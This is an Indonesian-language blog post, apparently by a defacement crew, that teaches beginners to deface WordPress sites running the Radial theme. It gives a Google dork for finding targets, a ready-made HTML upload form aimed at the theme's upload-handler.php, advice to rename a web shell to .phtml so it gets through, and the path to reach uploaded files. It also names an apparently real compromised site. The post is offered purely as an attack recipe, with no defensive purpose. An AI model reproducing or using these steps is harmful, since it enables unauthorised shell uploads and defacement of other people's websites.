Deface Wordpress Themes Radial

Siang fanss :) Siang juga haters :P Ketemu lagi sama gw, admin yg paling tamvan :P :P
Okee, kali ini gw mau share Tutorial Deface Wordpress Themes Radial. Master - master lewat aja ya, ini buat Newbie kek gw :)

Bahan :

1. Dork

inurl:/wp-content/themes/radial-themes
Kembanging biar dapet yg Vuln + Perawan :p

2. CSRF

<form enctype="multipart/form-data"action="site.co.li/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

3. Exploit

/wp-content/themes/radial-theme/functions/upload-handler.php

4. Shell atau Script Deface
       Belum punya? Nih, Script Deface sederhana gw, COMOT. 

Langkah - Langkah :
1. Dorking ke Google .

2. Pilih sala satu site.

3. Masukin exploit   

/wp-content/themes/radial-theme/functions/upload-handler.php 

Contoh:

 http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php

4. Kalo vuln bakal ada tulisan 'error'

5. Masukin site ke CSRF.
    Contoh:

<form enctype="multipart/form-data"action="http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

6. Upload file lu. Kalo mau upload shell, rename dulu jadi .phtml (contoh: shell.phtml)

7. Kalo sukses, akan keluar nama file lu.

8. File akses?

site.com/wp-content/uploads/tahun/bulan/namafile

Contoh:

http://www.jhttcars.be/wp-content/uploads/2017/01/berandal.txt

Kalo masih belom paham, liat video di bawah :)

 

Sekian tutorial gw kali ini, kalo ada pertanyaan, kontak gw aja dibawah :)

Regards, 

Berandal, [OWL SQUAD]